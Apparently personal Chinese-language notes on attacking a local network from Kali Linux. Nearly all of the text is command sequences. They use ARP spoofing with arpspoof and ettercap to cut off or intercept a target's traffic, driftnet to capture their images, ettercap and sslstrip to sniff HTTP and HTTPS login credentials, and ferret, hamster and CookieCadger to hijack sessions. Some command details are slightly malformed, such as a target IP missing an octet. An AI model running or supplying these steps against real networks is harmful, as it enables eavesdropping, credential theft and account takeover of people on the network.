局域網-斷網&劫持(kali)
1.查看局域網中的主機
fping –asg 192.168.1.0/24
2.斷網
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
(arpspoof -i 網卡 -t 目標IP 網關)
3.流量劫持
echo 1 >/proc/sys/net/ipv4/ip_forward
(echo空格1空格>)
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
4.圖片嗅探
(1)方法1(實驗不成功)
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
driftnet -i wlan0
(原因分析:可能丟包原因吧)
(2)方法2(成功)
sudo ettercap -i wlan0 -T -M arp:remote /192.168.1.253//192.168.1.100/
driftnet -i wlan0
(圖片文件夾:/tmp/driftnet)
(
Ubuntu下可以安裝工具:
sudo apt-get install ettercap-text-only
sudo apt-get install driftnet
)
5.http登錄賬號密碼嗅探
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
ettercap -Tq -i wlan0
(信息太龐雜,可以使用 ettercap -Tq -i wlan0 >test方便查找)
6.https登錄賬號密碼嗅探
vim /etc/ettercap.conf
將
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
修改為
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
sslstrip -a -f -k
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.100 192.168.1.1
ettercap -Tq -i wlan0
7.會話劫持
(1)方法1
arpspoof
wireshark -->抓包
ferret --。重新生成抓包后的文件
hamster -- > 重放流量
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
$wireshark
wireshark 保存為.pcap文件
$ferret -r cookie.pcap
將生成的txt文件放到用戶目錄下
$hamster
配置代理
訪問127.0.0.1:1234(上一步的代理)
(2)方法2
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
$ferret -i wlan0
$hamster
(3)方法3
$echo 1 >/proc/sys/net/ipv4/ip_forward
$arpspoof -i wlan0 -t 192.168.100 192.168.1.1
CookieCadger-1.08.jar